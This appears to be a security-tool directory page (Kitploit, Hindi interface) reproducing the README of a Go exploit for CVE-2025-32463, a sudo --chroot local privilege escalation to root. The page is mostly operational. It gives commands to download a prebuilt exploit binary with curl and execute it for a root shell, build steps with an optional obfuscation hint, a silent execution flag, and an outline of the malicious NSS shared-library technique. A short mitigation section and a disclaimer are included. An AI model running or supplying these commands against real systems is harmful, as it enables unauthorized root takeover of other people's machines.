Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32463 — This CVE addresses a vulnerability in sudo versions 1.9.14 to 1.9.17, enabling unauthorized local privilege escalation to root access. | Kitploit
उपकरण/GitHubGitHub/1xpwn/cve-2025-32463
Privilege EscalationExploitationPenetration TestingRed TeamingPayload Development
GitHub1xpwn/cve-2025-32463

CVE-2025-32463

This CVE addresses a vulnerability in sudo versions 1.9.14 to 1.9.17, enabling unauthorized local privilege escalation to root access.

रिपॉजिटरी देखें
26217 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
अनुरोधित भाषा में सामग्री उपलब्ध नहीं है। अंग्रेज़ी संस्करण दिखाया जा रहा है।

CVE-2025-32463 Exploit

GitHub stars GitHub license

Overview

This repository provides a Go-based exploit tool for CVE-2025-32463, a critical local privilege escalation vulnerability (CVSS 9.3) in sudo versions 1.9.14 to 1.9.17. It allows unauthorized local users to gain root access by exploiting a flaw in the --chroot (-R) option.

⚠️ Warning: For educational and testing purposes only. Use in isolated environments (e.g., VMs). Not for malicious use.

Vulnerability Details

  • CVE ID: CVE-2025-32463
  • Affected Versions: sudo 1.9.14–1.9.17
  • Impact: Local privilege escalation to root
  • Description: The exploit manipulates the chroot environment to load a malicious shared library, setting UID/GID to 0 and spawning a root shell.

Prerequisites

  • Go 1.2+
  • gcc
  • libc-dev
  • Vulnerable sudo version
  • Non-privileged user with sudo access and --chroot permissions

Quick Start

Download Pre-built Binary

root@kitploit:~
curl -L https://github.com/1xPwn/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution  # Launches root shell

Build from Source

root@kitploit:~
git clone https://github.com/1xPwn/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit  # Or use garble for obfuscation
./exploit --execution

Usage

CommandDescription
./exploit --helpShow usage help
./exploit --aboutDisplay CVE details

Verification: In the root shell, run id (should show uid=0(root)) or whoami (should show root).

How It Works (High-Level)

  1. Creates temp dir /tmp/sudowoot.stage.*
  2. Generates malicious C code (woot1337.c) for root shell
  3. Sets up fake chroot with NSS config
  4. Compiles to shared lib (libnss_/woot1337.so.2)
  5. Runs sudo -R woot woot to load lib and escalate
  6. Auto-cleans temp files

Mitigation

  • Update sudo to latest version
  • Disable chroot: Add Defaults !use_chroot to /etc/sudoers

References

  • NVD Entry

Disclaimer

This tool is for security research. The author is not responsible for misuse. Always test responsibly.


Built by MNM

टूल डाउनलोड करें
./exploit --executionRun exploit (opens root shell)
./exploit --execution --silentSilent mode execution